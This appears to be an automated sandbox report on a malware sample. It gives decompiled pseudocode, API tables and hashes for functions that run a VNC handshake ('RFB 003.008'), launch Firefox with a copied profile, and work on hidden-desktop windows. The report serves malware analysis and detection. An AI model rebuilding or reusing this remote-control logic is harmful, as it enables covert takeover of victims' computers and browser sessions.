				signed long long _t185;
				long long _t186;
				void* _t187;
				void* _t188;
				signed long long _t194;
				signed long long _t197;
				void* _t198;
				signed long long _t201;
				long _t202;

				_t198 = __r11;
				_t121 = __esi;
				_t120 = __edi;
				_t187 = _t188;
				_t186 = __rcx;
				asm("lock inc dword [0x2a492]");
				_t135 = __rcx + 0x40;
				r15d = 0;
				_t122 = r15d;
				do {
					_t133 =  &_v132;
					_v144 = _t133;
					_t197 =  &_a24;
					r8d = 0x13;
					_v152 = _t202;
					_v132 = r15d;
					_a24 = r15w;
					E00C6B070(_t121, _t122, _t135, _t135,  *((intOrPtr*)(_t186 + 0x38)), _t186, _t187, _t197);
					 *(_t186 + 0x50) = _t133;
					if(_t133 != 0xffffffff) {
						r8d = 0x10;
						_t84 = memcpy(??, ??, ??);
						__imp__#9();
						_v86 = _t84;
						while(1) {
							L4:
							_t85 = E00C6C840(_t84, 0x493e0,  *(_t186 + 0x50));
							r9d = 0;
							_t16 = _t197 + 8; // 0x8
							r8d = _t16;
							__imp__#16();
							if(_t85 != 8) {
								break;
							}
							if(_v112 != 0xa) {
								L35:
								__imp__#22();
								__imp__#3();
								_t76 = _t186 + 0x50;
								 *_t76 =  *(_t186 + 0x50) | 0xffffffff;
								__eflags =  *_t76;
								_t135 = _t186 + 0x40;
								goto L36;
							}
							_t87 = E00C6AFD0(_t85, _t133, _t135,  &_v88,  &_v112);
							_t201 = _t133;
							if(_t133 == 0xffffffff) {
								goto L35;
							}
							E00C6C840(_t87, 0x927c0, _t133);
							r8d = 0x42d8;
							_v128 = _v132;
							_t98 = 8;
							_t84 = HeapAlloc(??, ??, ??);
							_t185 = _t133;
							if(_t133 == 0) {
								L32:
								__imp__#3();
								if(_t98 != 0) {
									__imp__#3();
								}
								continue;
							}
							r8d = 0x42d8;
							memset(??, ??, ??);
							_t21 = _t185 + 0x38; // 0x38
							_t202 = _t21;
							 *(_t185 + 0x28) = _t201;
							 *((long long*)(_t185 + 0x18)) = _t186;
							 *(_t185 + 8) = _t185;
							 *_t185 = _t185;
							InitializeCriticalSection(??);
							 *(_t185 + 0xa8) =  *(_t185 + 0xa8) | 0xffffffff;
							_t28 = _t135 - 4; // 0x4
							E00C6C894(_t28, _t133, _t135,  &_v128, _t185, _t186, _t185 + 0x41d6, _t198);
							_t31 = _t135 - 4; // 0x4
							E00C6C894(_t31, _t133, _t135,  &_v128, _t185, _t186, _t185 + 0x40d4, _t198);
							r8d = GetCurrentThreadId();
							OpenThread(??, ??, ??);
							 *(_t185 + 0x20) = _t133;
							if(_t133 == 0) {
								_t98 = GetLastError();
								L30:
								if(_t98 == 0) {
									r15d = 0;
									__eflags = r15d;
									continue;
								}
								DeleteCriticalSection();
								_t84 = HeapFree(??, ??, ??);
								r15d = 0;
								goto L32;
							}
							EnterCriticalSection();
							_t158 =  *(_t186 + 8);
							 *(_t185 + 8) = _t158;
							 *_t185 = _t186;
							 *_t158 = _t185;
							 *(_t186 + 8) = _t185;
							LeaveCriticalSection(??);
							_v136 = _v136 & 0x00000000;
							_t202 =  *((intOrPtr*)(_t185 + 0x18));
							r8d = 0xc;
							if(E00C6BE28(_t121, _t135, _t185, "RFB 003.008\n", _t185, _t186) == 0xc) {
								r8d = 0xc;
								_t84 = E00C6BD0C(_t84, _t120, _t135, _t185,  &_v104, _t185, _t186, _t187);
								_t98 = _t84;
								__eflags = _t84;
								if(_t84 != 0) {
									L22:
									__eflags = _t98 - 0xffffffff;
									if(_t98 == 0xffffffff) {
										_t98 = GetLastError();
									}
									L24:
									r15d = 0;
									__eflags = _t98;
									if(_t98 != 0) {
										L28:
										EnterCriticalSection();
										_t179 =  *(_t185 + 8);
										_t194 =  *_t185;
										 *_t179 = _t194;
										 *((long long*)(_t194 + 8)) = _t179;
										LeaveCriticalSection(??);
										_t202 = _t185 + 0x38;
										goto L30;
									}
									_t133 =  &_v116;
									_t197 = _t185;
									_v144 = _t133;
									_v152 = r15d;
									CreateThread(??, ??, ??, ??, ??, ??);
									 *(_t185 + 0x20) = _t133;
									__eflags = _t133;
									if(_t133 == 0) {
										_t84 = GetLastError();
										_t98 = _t84;
										__eflags = _t84;
										if(_t84 == 0) {
											continue;
										}
										goto L28;
									}
									_t84 = CloseHandle();
									continue;
								}
								_v92 = _t84;
								_t84 = lstrcmpiA(??, ??);
								__eflags = _t84;
								if(_t84 != 0) {
									goto L10;
								}
								E00C6B2C8(_t84, _t135, _t185);
								_t44 = _t135 + 2; // 0x2
								r8d = _t44;
								_a32 = 0x101;
								_t84 = E00C6BE28(_t121, _t135, _t185,  &_a32, _t185, _t186);
								__eflags = _t84 - 2;
								if(_t84 != 2) {
									goto L24;
								}
								_t47 = _t135 + 1; // 0x1
								r8d = _t47;
								_t84 = E00C6BD0C(_t84, _t120, _t135, _t185,  &_a8, _t185, _t186, _t187);
								_t98 = _t84;
								__eflags = _t84;
								if(_t84 != 0) {
									goto L22;
								}
								__eflags = _a8 - 1;
								if(_a8 != 1) {
									goto L10;
								}
								_v120 = _v120 & _t84;
								_t52 = _t133 + 4; // 0x4
								r8d = _t52;
								_t84 = E00C6BE28(_t121, _t135, _t185,  &_v120, _t185, _t186);
								__eflags = _t84 - 4;
								if(_t84 != 4) {
									goto L24;
								} else {
									goto L17;
								}
								while(1) {
									L17:
									Sleep();
									__imp__#10();
									__eflags = _t84;
									if(_t84 != 0) {
										break;
									}
									__eflags = _v136 - 1;
									if(_v136 >= 1) {
										break;
									}
									_t84 = WaitForSingleObject();
									__eflags = _t84 - 0x102;
									if(_t84 == 0x102) {
										continue;
									}
									break;
								}
								_t133 = _v136;
								__eflags = _t133 - 1;
								if(_t133 < 1) {
									goto L24;
								}
								r8d = 1;
								_t97 = E00C6BD0C(_t84, _t120, _t135, _t185,  &_a16, _t185, _t186, _t187);
								__eflags = _t97;
								_t84 = 0x57;
								_t98 =  !=  ? 0x57 : _t97;
								goto L22;
							}
							L10:
							_t98 = 0x57;
							goto L28;
						}
						_v108 = _v132;
						_v112 = 0xb;
						_t84 = E00C6C840(_v132, 0x7530,  *(_t186 + 0x50));
						r9d = 0;
						_t73 = _t197 + 8; // 0x8
						r8d = _t73;
						__imp__#19();
						__eflags = _t84 - 8;
						if(_t84 == 8) {
							goto L4;
						}
						goto L35;
					}
					L36:
					__eflags = WaitForSingleObject() - 0x102;
				} while (__eflags == 0);
				_t83 = GetLastError();
				 *(_t186 + 0x68) = _t83;
				asm("lock dec dword [0x2a082]");
				return _t83;
			}

0x00c6b36c
0x00c6b36c
0x00c6b36c
0x00c6b379
0x00c6b380
0x00c6b383
0x00c6b38a
0x00c6b38e
0x00c6b38e
0x00c6b391
0x00c6b395
0x00c6b399
0x00c6b39e
0x00c6b3a2
0x00c6b3a8
0x00c6b3b0
0x00c6b3b4
0x00c6b3b9
0x00c6b3be
0x00c6b3c6
0x00c6b3cc
0x00c6b3d9
0x00c6b3e2
0x00c6b3e8
0x00c6b3f1
0x00c6b3f1
0x00c6b3fa
0x00c6b407
0x00c6b40a
0x00c6b40a
0x00c6b40e
0x00c6b417
0x00000000
0x00000000
0x00c6b421
0x00c6b74e
0x00c6b757
0x00c6b761
0x00c6b767
0x00c6b767
0x00c6b767
0x00c6b76c
0x00000000
0x00c6b76c
0x00c6b42b
0x00c6b430
0x00c6b437
0x00000000
0x00000000
0x00c6b445
0x00c6b456
0x00c6b45c
0x00c6b45f
0x00c6b464
0x00c6b46a
0x00c6b470
0x00c6b6f6
0x00c6b6f9
0x00c6b701
0x00c6b70a
0x00c6b70a
0x00000000
0x00c6b701
0x00c6b478
0x00c6b481
0x00c6b486
0x00c6b486
0x00c6b48a
0x00c6b491
0x00c6b495
0x00c6b499
0x00c6b49c
0x00c6b4a2
0x00c6b4b0
0x00c6b4b7
0x00c6b4c3
0x00c6b4ca
0x00c6b4dc
0x00c6b4df
0x00c6b4e5
0x00c6b4ef
0x00c6b6ce
0x00c6b6d0
0x00c6b6d2
0x00c6b3ee
0x00c6b3ee
0x00000000
0x00c6b3ee
0x00c6b6db
0x00c6b6ed
0x00c6b6f3
0x00000000
0x00c6b6f3
0x00c6b4fc
0x00c6b502
0x00c6b506
0x00c6b50a
0x00c6b50d
0x00c6b513
0x00c6b517
0x00c6b51d
0x00c6b528
0x00c6b531
0x00c6b53e
0x00c6b54a
0x00c6b554
0x00c6b559
0x00c6b55b
0x00c6b55d
0x00c6b645
0x00c6b645
0x00c6b648
0x00c6b650
0x00c6b650
0x00c6b652
0x00c6b652
0x00c6b655
0x00c6b657
0x00c6b6a2
0x00c6b6a5
0x00c6b6ab
0x00c6b6b2
0x00c6b6b5
0x00c6b6b8
0x00c6b6bc
0x00c6b6c2
0x00000000
0x00c6b6c2
0x00c6b659
0x00c6b65d
0x00c6b660
0x00c6b66e
0x00c6b675
0x00c6b67b
0x00c6b67f
0x00c6b682
0x00c6b692
0x00c6b698
0x00c6b69a
0x00c6b69c
0x00000000
0x00000000
0x00000000
0x00c6b69c
0x00c6b687
0x00000000
0x00c6b687
0x00c6b56a
0x00c6b571
0x00c6b577
0x00c6b579
0x00000000
0x00000000
0x00c6b57e
0x00c6b583
0x00c6b583
0x00c6b587
0x00c6b594
0x00c6b599
0x00c6b59c
0x00000000
0x00000000
0x00c6b5a2
0x00c6b5a2
0x00c6b5ad
0x00c6b5b2
0x00c6b5b4
0x00c6b5b6
0x00000000
0x00000000
0x00c6b5bc
0x00c6b5c0
0x00000000
0x00000000
0x00c6b5c6
0x00c6b5c9
0x00c6b5c9
0x00c6b5d4
0x00c6b5d9
0x00c6b5dc
0x00000000
0x00000000
0x00000000
0x00000000
0x00c6b5de
0x00c6b5de
0x00c6b5e3
0x00c6b5f6
0x00c6b5fc
0x00c6b5fe
0x00000000
0x00000000
0x00c6b604
0x00c6b608
0x00000000
0x00000000
0x00c6b610
0x00c6b616
0x00c6b61b
0x00000000
0x00000000
0x00000000
0x00c6b61b
0x00c6b61d
0x00c6b621
0x00c6b625
0x00000000
0x00000000
0x00c6b627
0x00c6b634
0x00c6b63b
0x00c6b63d
0x00c6b642
0x00000000
0x00c6b642
0x00c6b540
0x00c6b540
0x00000000
0x00c6b540
0x00c6b721
0x00c6b724
0x00c6b72b
0x00c6b738
0x00c6b73b
0x00c6b73b
0x00c6b73f
0x00c6b745
0x00c6b748
0x00000000
0x00000000
0x00000000
0x00c6b748
0x00c6b770
0x00c6b77f
0x00c6b77f
0x00c6b78a
0x00c6b790
0x00c6b793
0x00c6b7aa

APIs

Part of subcall function 00C6B070: socket.WS2_32 ref: 00C6B0BF
Part of subcall function 00C6B070: connect.WS2_32 ref: 00C6B0DE
Part of subcall function 00C6B070: setsockopt.WS2_32 ref: 00C6B10B
Part of subcall function 00C6B070: send.WS2_32 ref: 00C6B12E
Part of subcall function 00C6B070: recv.WS2_32 ref: 00C6B147
Part of subcall function 00C6B070: HeapFree.KERNEL32 ref: 00C6B1BA

memcpy.NTDLL ref: 00C6B3D9
htons.WS2_32 ref: 00C6B3E2

Part of subcall function 00C6C840: setsockopt.WS2_32 ref: 00C6C864
Part of subcall function 00C6C840: setsockopt.WS2_32 ref: 00C6C885

recv.WS2_32 ref: 00C6B40E
HeapAlloc.KERNEL32 ref: 00C6B464
memset.NTDLL ref: 00C6B481
InitializeCriticalSection.KERNEL32 ref: 00C6B49C
GetCurrentThreadId.KERNEL32 ref: 00C6B4CF
OpenThread.KERNEL32 ref: 00C6B4DF
EnterCriticalSection.KERNEL32 ref: 00C6B4FC
LeaveCriticalSection.KERNEL32 ref: 00C6B517
lstrcmpiA.KERNEL32 ref: 00C6B571
Sleep.KERNEL32 ref: 00C6B5E3
ioctlsocket.WS2_32 ref: 00C6B5F6
WaitForSingleObject.KERNEL32 ref: 00C6B610
GetLastError.KERNEL32 ref: 00C6B64A
CreateThread.KERNEL32 ref: 00C6B675
CloseHandle.KERNEL32 ref: 00C6B687
GetLastError.KERNEL32 ref: 00C6B692
EnterCriticalSection.KERNEL32 ref: 00C6B6A5
LeaveCriticalSection.KERNEL32 ref: 00C6B6BC
GetLastError.KERNEL32 ref: 00C6B6C8
DeleteCriticalSection.KERNEL32 ref: 00C6B6DB
HeapFree.KERNEL32 ref: 00C6B6ED
closesocket.WS2_32 ref: 00C6B6F9
closesocket.WS2_32 ref: 00C6B70A

Part of subcall function 00C6BD0C: recv.WS2_32 ref: 00C6BD3D
Part of subcall function 00C6BD0C: GetLastError.KERNEL32 ref: 00C6BD69

send.WS2_32 ref: 00C6B73F
shutdown.WS2_32 ref: 00C6B757
closesocket.WS2_32 ref: 00C6B761

Part of subcall function 00C6AFD0: socket.WS2_32 ref: 00C6AFE9
Part of subcall function 00C6AFD0: connect.WS2_32 ref: 00C6B004
Part of subcall function 00C6AFD0: setsockopt.WS2_32 ref: 00C6B02D

WaitForSingleObject.KERNEL32 ref: 00C6B779
GetLastError.KERNEL32 ref: 00C6B78A

Strings

RFB 003.008, xrefs: 00C6B521, 00C6B563

Memory Dump Source

Source File: 00000005.00000002.938116382.0000000000C61000.00000020.00020000.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000005.00000002.938071234.0000000000C60000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.938281863.0000000000C88000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.938397557.0000000000C90000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.938493142.0000000000C97000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: CriticalSection$ErrorLast$setsockopt$HeapThreadclosesocketrecv$EnterFreeLeaveObjectSingleWaitconnectsendsocket$AllocCloseCreateCurrentDeleteHandleInitializeOpenSleephtonsioctlsocketlstrcmpimemcpymemsetshutdown
String ID: RFB 003.008
API String ID: 955141763-2137906931
Opcode ID: ca73c9375cd4023ea6abed7f81302fb6d3f948d599c2766709c08b95c2b797db
Instruction ID: d530e25caf81517afc0a2621bfdcec9ee67269ca2034486f9b76734cdbff65ce
Opcode Fuzzy Hash: ca73c9375cd4023ea6abed7f81302fb6d3f948d599c2766709c08b95c2b797db
Instruction Fuzzy Hash: C4B17132700B4186EB34DB76E9D47AD33A1FB44B94F908625DE5A87B54DF38C999C304

Uniqueness

Uniqueness Score: -1.00%

Function 00C766A4, Relevance: 54.4, APIs: 27, Strings: 4, Instructions: 189
memorystringsynchronizationCOMMONCrypto

Download Yara Rule

C-Code - Quality: 22%

			E00C766A4(void* __ebx, void* __edx, long long __rbx, void* __rcx, long long __rsi, long long __rbp, long long* __r8, char _a32) {
				void* _v40;
				char _v360;
				void* __rdi;
				void* _t40;
				int _t47;
				void* _t61;
				long _t70;
				long long _t77;
				void* _t125;
				long long _t127;
				long long _t129;
				long long _t131;
				long long* _t134;
				char* _t146;
				long long _t149;
				long long* _t152;
				long long _t154;
				long long _t157;

				_t134 = __r8;
				_t129 = __rbp;
				_t127 = __rsi;
				_t78 = __rbx;
				_t77 = _t131;
				 *((long long*)(_t77 + 8)) = __rbx;
				 *((long long*)(_t77 + 0x10)) = __rbp;
				 *((long long*)(_t77 + 0x18)) = __rsi;
				_push(_t154);
				 *(_t77 + 0x20) =  *(_t77 + 0x20) & 0;
				_t152 = __r8;
				_t125 = __rcx;
				r14d = 0;
				E00C7A500(__rbx, __rcx, L"FF", __rcx, __rsi);
				_t149 = _t77;
				if(_t77 != 0) {
					lstrcpyA();
					lstrcatA(??, ??);
					lstrcatA(??, ??);
					r8d = 0;
					_t146 =  &_v360;
					_t11 = _t134 + 1; // 0x1
					_t61 = _t11;
					CreateEventA(??, ??, ??, ??);
					_t157 = _t77;
					if(_t77 == 0) {
						L22:
						_t70 = 0x5b4;
						L23:
						HeapFree();
						if(_t127 != 0) {
							HeapFree();
						}
						goto L25;
					}
					if(GetLastError() == 0xb7) {
						_t61 = 0x927c0;
						if(WaitForSingleObject(??, ??) != 0) {
							CloseHandle();
							r15d = 0;
						}
					}
					if(_t157 == 0) {
						goto L22;
					}
					if(E00C76C5C(_t77, _t78, _t125) != 0) {
						_t70 = 0;
						L17:
						lstrlenW();
						HeapAlloc(??, ??, ??);
						_t154 = _t77;
						if(_t77 != 0) {
							lstrcpyW();
							lstrcatW(??, ??);
						} else {
							_t15 = _t77 + 8; // 0x8
							_t70 = _t15;
						}
						L20:
						SetEvent();
						CloseHandle(??);
						if(_t129 != 0) {
							HeapFree();
						}
						goto L23;
					}
					E00C7A42C(0, _t61, _t77, _t78, L"APPDATA", _t127, _t129, L"Mozilla\\Firefox");
					_t127 = _t77;
					if(_t77 != 0) {
						_t120 =  &_a32;
						_t40 = E00C76984(_t77, _t78, _t127,  &_a32, _t146);
						_t129 = _t77;
						if(_t77 == 0) {
							goto L9;
						}
						E00C6A708(_t40, _t77);
						if(_a32 == r14d) {
							_t127 = _t129;
							HeapFree(??, ??, ??);
							L15:
							E00C7A8A0(_t77, _t78, _t125, _t120);
							_t70 = E00C7FAD4(0, _t77, _t77, L"firefox.exe", _t127, _t149, _t146);
							E00C7A914(_t77, _t146);
							goto L17;
						}
						_t47 = lstrlenW();
						lstrlenW(??);
						_t14 = _t77 + 2; // 0x2
						r8d = _t14;
						r8d = r8d + _t47;
						HeapAlloc(??, ??, ??);
						_t78 = _t77;
						if(_t77 == 0) {
							goto L9;
						}
						lstrcpyW();
						lstrcatW(??, ??);
						_t120 = _t129;
						lstrcatW(??, ??);
						_t127 = _t78;
						HeapFree(??, ??, ??);
						goto L15;
					}
					L9:
					_t70 = GetLastError();
					goto L20;
				} else {
					_t70 = GetLastError();
					L25:
					if(_t70 == 0) {
						 *_t152 = _t154;
					} else {
						if(_t154 != 0) {
							HeapFree();
						}
					}
					return _t70;
				}
			}

0x00c766a4
0x00c766a4
0x00c766a4
0x00c766a4
0x00c766a4
0x00c766a7
0x00c766ab
0x00c766af
0x00c766b8
0x00c766cc
0x00c766cf
0x00c766d2
0x00c766d7
0x00c766da
0x00c766df
0x00c766e5
0x00c76700
0x00c76712
0x00c76728
0x00c7672e
0x00c76731
0x00c76738
0x00c76738
0x00c7673c
0x00c76742
0x00c76748
0x00c76912
0x00c76912
0x00c76917
0x00c76923
0x00c7692c
0x00c7693a
0x00c7693a
0x00000000
0x00c7692c
0x00c76759
0x00c7675b
0x00c7676b
0x00c76770
0x00c76776
0x00c76776
0x00c7676b
0x00c7677c
0x00000000
0x00000000
0x00c7678c
0x00c7689b
0x00c7689d
0x00c768a0
0x00c768b8
0x00c768be
0x00c768c4
0x00c768d5
0x00c768e1
0x00c768c6
0x00c768c6
0x00c768c6
0x00c768c6
0x00c768e7
0x00c768ea
0x00c768f3
0x00c768fc
0x00c7690a
0x00c7690a
0x00000000
0x00c768fc
0x00c767a3
0x00c767a8
0x00c767ae
0x00c767bd
0x00c767c8
0x00c767cd
0x00c767d3
0x00000000
0x00000000
0x00c767d8
0x00c767e5
0x00c76867
0x00c7686a
0x00c76872
0x00c76875
0x00c76892
0x00c76894
0x00000000
0x00c76894
0x00c767ea
0x00c767f5
0x00c76804
0x00c76804
0x00c76808
0x00c7680e
0x00c76814
0x00c7681a
0x00000000
0x00000000
0x00c76822
0x00c76832
0x00c76838
0x00c7683e
0x00c76850
0x00c76853
0x00000000
0x00c76853
0x00c767b0
0x00c767b6
0x00000000
0x00c766e7
0x00c766ed
0x00c76940
0x00c76942
0x00c7695d
0x00c76944
0x00c76947
0x00c76955
0x00c76955
0x00c76947
0x00c76983
0x00c76983

APIs

Part of subcall function 00C7A500: GetTempPathW.KERNEL32(?,?,?,00000000,00000000,00C766DF), ref: 00C7A52B
Part of subcall function 00C7A500: GetLastError.KERNEL32(?,?,?,00000000,00000000,00C766DF), ref: 00C7A537
Part of subcall function 00C7A500: HeapFree.KERNEL32(?,?,?,00000000,00000000,00C766DF), ref: 00C7A661

GetLastError.KERNEL32 ref: 00C766E7
lstrcpyA.KERNEL32 ref: 00C76700
lstrcatA.KERNEL32 ref: 00C76712
lstrcatA.KERNEL32 ref: 00C76728
CreateEventA.KERNEL32 ref: 00C7673C
GetLastError.KERNEL32 ref: 00C7674E
WaitForSingleObject.KERNEL32 ref: 00C76763
CloseHandle.KERNEL32 ref: 00C76770
GetLastError.KERNEL32 ref: 00C767B0
SetEvent.KERNEL32 ref: 00C768EA
CloseHandle.KERNEL32 ref: 00C768F3
HeapFree.KERNEL32 ref: 00C7690A
HeapFree.KERNEL32 ref: 00C76923
HeapFree.KERNEL32 ref: 00C7693A
HeapFree.KERNEL32 ref: 00C76955

Strings

firefox.exe, xrefs: 00C7687D
Mozilla\Firefox, xrefs: 00C76792
--no-remote -profile , xrefs: 00C768CB
APPDATA, xrefs: 00C7679C

Memory Dump Source

Source File: 00000005.00000002.938116382.0000000000C61000.00000020.00020000.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000005.00000002.938071234.0000000000C60000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.938281863.0000000000C88000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.938397557.0000000000C90000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.938493142.0000000000C97000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: FreeHeap$ErrorLast$CloseEventHandlelstrcat$CreateObjectPathSingleTempWaitlstrcpy
String ID: --no-remote -profile $APPDATA$Mozilla\Firefox$firefox.exe
API String ID: 3891805355-3662271188
Opcode ID: b4a7fc5ba81804e43d32e3c150d23b25397f9433d3b7802c7f1462a278bb22c0
Instruction ID: 2102a8f062af906d855db917f4ccdc4903da2a0fdba9d05b180527f667289b61
Opcode Fuzzy Hash: b4a7fc5ba81804e43d32e3c150d23b25397f9433d3b7802c7f1462a278bb22c0
Instruction Fuzzy Hash: E3716B65201F4182FE29DB62E858B6963A1BB89FD0F98C625CD1E17B25DF3CC64AC304

Uniqueness

Uniqueness Score: -1.00%

Function 00C687CC, Relevance: 52.7, APIs: 19, Strings: 11, Instructions: 202
threadmemorysleepCOMMONCrypto

Download Yara Rule

C-Code - Quality: 23%

			E00C687CC(void* __esi, void* __ebp, signed long long __rax, signed long long __rbx, void* __rcx, long long __rdi, long long __rsi, void* __r8, void* __r10, long long __r14) {
				void* __rbp;
				signed long long _t36;
				signed long long _t47;
				long _t60;
				void* _t61;
				void* _t81;
				signed long long _t83;
				signed long long _t88;
				signed long long _t89;
				signed long long _t90;
				signed long long _t91;
				void* _t115;
				signed long long _t123;
				long long _t125;
				void* _t129;
				void* _t130;
				void* _t131;
				void* _t133;
				void* _t134;
				long long _t141;

				_t141 = __r14;
				_t134 = __r8;
				_t91 = __rbx;
				_t88 = __rax;
				_t131 = _t130 - 0x30;
				_t129 = _t131 + 0x30;
				 *((long long*)(_t129 + 0x10)) = __rbx;
				 *((long long*)(_t129 + 0x18)) = __rsi;
				 *((long long*)(_t129 + 0x20)) = __rdi;
				 *((long long*)(_t129 + 0x28)) = __r14;
				r14d = 0;
				GetCurrentThreadId();
				GetThreadDesktop(??);
				_t123 = __rax;
				E00C6ADF0();
				GetModuleHandleA(??);
				GetProcAddress(??, ??);
				 *0xc95870 = __rax;
				_t127 = 0xc95710;
				if(__rax != 0) {
					r9d = 0;
					r8d = 0;
					_t36 = E00C788A0(__rax, __rbx, 0xc95710);
					_t83 = _t36;
					__eflags = _t36;
					if(_t36 != 0) {
						L23:
						__eflags = _t83 - 2;
						if(_t83 == 2) {
							goto L31;
						}
						__eflags = _t91;
						if(_t91 != 0) {
							_t23 = _t91 + 0x88; // 0x88
							E00C7E3D4(_t88, _t91, _t23, _t127, _t129);
							__eflags =  *((intOrPtr*)(_t91 + 0x10));
							if( *((intOrPtr*)(_t91 + 0x10)) != 0) {
								CloseHandle();
							}
							__eflags =  *((intOrPtr*)(_t91 + 0x768));
							if( *((intOrPtr*)(_t91 + 0x768)) != 0) {
								CloseHandle();
								 *((long long*)(_t91 + 0x768)) = _t141;
							}
							__eflags = 0;
							HeapFree(??, ??, ??);
						}
						goto L30;
					}
					SetErrorMode();
					E00C68B38(__rax);
					r8d = 0x878;
					HeapAlloc(??, ??, ??);
					_t91 = __rax;
					__eflags = __rax;
					if(__rax == 0) {
						goto L31;
					}
					r8d = 0x778;
					L00C6A50A();
					r8d = 0;
					CreateMutexA(??, ??, ??);
					 *((long long*)(__rax + 0x10)) = __rax;
					__eflags = __rax;
					if(__eflags == 0) {
						goto L31;
					}
					_t8 = _t91 + 0x88; // 0x88
					_t47 = E00C7E238(0, __eflags, __rax, _t8, 0xc95710, 0xc95710, _t129, _t134, __r10);
					_t83 = _t47;
					__eflags = _t47;
					if(_t47 != 0) {
						goto L23;
					}
					asm("movaps xmm0, [0x2ce3f]");
					_t136 = E00C68C8C;
					asm("movups [ebx+0x18], xmm0");
					 *((long long*)(_t131 + 0x28)) = __r14;
					asm("movaps xmm1, [0x2ce35]");
					_t81 = 0;
					asm("movups [ebx+0x28], xmm1");
					 *((intOrPtr*)(_t131 + 0x20)) = r14d;
					asm("movaps xmm0, [0x2ce31]");
					asm("movups [ebx+0x38], xmm0");
					asm("movaps xmm1, [0x2ce36]");
					asm("movups [ebx+0x48], xmm1");
					asm("movaps xmm0, [0x2ce3b]");
					asm("movups [ebx+0x58], xmm0");
					CreateThread(??, ??, ??, ??, ??, ??);
					CloseHandle(??);
					_t89 =  *0xc95730; // 0x0
					__eflags = _t89;
					if(_t89 == 0) {
						L13:
						_t127 =  *0xc95690; // 0x20dcd802040
						__eflags = _t127;
						if(_t127 != 0) {
							lstrlenA();
							r8d = _t123 + _t89;
							_t115 = _t136 + _t136;
							_t90 = _t115 + 0xf;
							__eflags = _t90 - _t115;
							if(_t90 <= _t115) {
								_t90 = 0xfffffff0;
							}
							_t89 = _t90 & 0xfffffff0;
							E00C6A4A0();
							_t133 = _t131 - _t89;
							r9d = r9d | 0xffffffff;
							_t81 = 0;
							__eflags = 0;
							 *((intOrPtr*)(_t133 + 0x28)) = r8d;
							_t125 = _t133 + 0x30;
							_t136 = _t127;
							 *_t125 = r14w;
							 *((long long*)(_t133 + 0x20)) = _t125;
							MultiByteToWideChar(??, ??, ??, ??, ??, ??);
						} else {
							_t125 = _t141;
						}
						r8d =  *0xc9567c; // 0x6beb0604
						_t107 = _t91;
						E00C7A184(_t81, _t89, _t91, _t91, _t125, _t125, _t127, _t136);
						L19:
						r8d = 0;
						E00C7B940(_t89, _t91, _t107, "Shell_TrayWnd", _t127, _t129, _t136);
						r8d = 0;
						 *(_t91 + 0xe8) = _t89;
						E00C7B940(_t89, _t91, _t107, "NotifyIconOverflowWindow", _t127, _t129, _t136);
						 *(_t91 + 0x130) = _t89;
						 *0xc95760 = _t91;
						_t83 = r14d;
						GetModuleHandleA(??);
						__eflags = _t89;
						if(_t89 != 0) {
							GetProcAddress();
							__eflags = _t89;
							if(_t89 != 0) {
								__eflags = 0;
								 *_t89();
							}
						}
						E00C7D4E4();
						E00C6A0EC();
						goto L31;
					} else {
						goto L7;
					}
					while(1) {
						L7:
						__eflags =  *((intOrPtr*)(_t89 + 0x16c)) - r14d;
						if( *((intOrPtr*)(_t89 + 0x16c)) != r14d) {
							break;
						}
						Sleep();
						_t89 =  *0xc95730; // 0x0
						__eflags = _t89;
						if(_t89 != 0) {
							continue;
						}
						break;
					}
					__eflags = _t89;
					if(_t89 == 0) {
						goto L13;
					}
					_t60 = GetCurrentProcessId();
					_t107 =  *0xc95730; // 0x0
					__eflags =  *((intOrPtr*)(_t107 + 0x16c)) - _t60;
					if( *((intOrPtr*)(_t107 + 0x16c)) != _t60) {
						goto L13;
					} else {
						 *0xc95768 = 1;
						_t61 = E00C6ADD8();
						__eflags = _t61 - 5;
						if(_t61 > 5) {
							FindWindowExA();
							r8d = 0;
							E00C7B940(_t89, _t91, _t89, "SHELLDLL_DefView", _t127, _t129, "Progman");
							_t136 = "FolderView";
							 *(_t91 + 0x118) = _t89;
							_t107 = _t89;
							E00C7B940(_t89, _t91, _t89, "SysListView32", _t127, _t129, "FolderView");
							 *(_t91 + 0x110) = _t89;
						}
						goto L19;
					}
				} else {
					_t6 = _t88 + 0x7f; // 0x7f
					_t83 = _t6;
					L30:
					E00C78C54(_t127);
					L31:
					return _t83;
				}
			}

0x00c687cc
0x00c687cc
0x00c687cc
0x00c687cc
0x00c687ce
0x00c687d2
0x00c687d7
0x00c687db
0x00c687df
0x00c687e3
0x00c687e7
0x00c687ed
0x00c687f5
0x00c687fb
0x00c687fe
0x00c6880a
0x00c6881a
0x00c68820
0x00c68827
0x00c68831
0x00c6883b
0x00c6883e
0x00c68847
0x00c6884c
0x00c6884e
0x00c68850
0x00c68ac6
0x00c68ac6
0x00c68ac9
0x00000000
0x00000000
0x00c68acb
0x00c68ace
0x00c68ad0
0x00c68ad7
0x00c68ae0
0x00c68ae3
0x00c68ae5
0x00c68ae5
0x00c68af2
0x00c68af5
0x00c68af7
0x00c68afd
0x00c68afd
0x00c68b0e
0x00c68b10
0x00c68b10
0x00000000
0x00c68ace
0x00c6885b
0x00c68861
0x00c6886f
0x00c68875
0x00c6887b
0x00c6887e
0x00c68881
0x00000000
0x00000000
0x00c68889
0x00c68892
0x00c68897
0x00c6889e
0x00c688a4
0x00c688a8
0x00c688ab
0x00000000
0x00000000
0x00c688b1
0x00c688bb
0x00c688c0
0x00c688c2
0x00c688c4
0x00000000
0x00000000
0x00c688ca
0x00c688d1
0x00c688d8
0x00c688df
0x00c688e4
0x00c688eb
0x00c688ed
0x00c688f3
0x00c688f8
0x00c688ff
0x00c68903
0x00c6890a
0x00c6890e
0x00c68915
0x00c68919
0x00c68922
0x00c68928
0x00c68934
0x00c68937
0x00c689d8
0x00c689d8
0x00c689df
0x00c689e2
0x00c689ec
0x00c689f2
0x00c689fa
0x00c689fd
0x00c68a01
0x00c68a04
0x00c68a06
0x00c68a06
0x00c68a10
0x00c68a14
0x00c68a19
0x00c68a1c
0x00c68a20
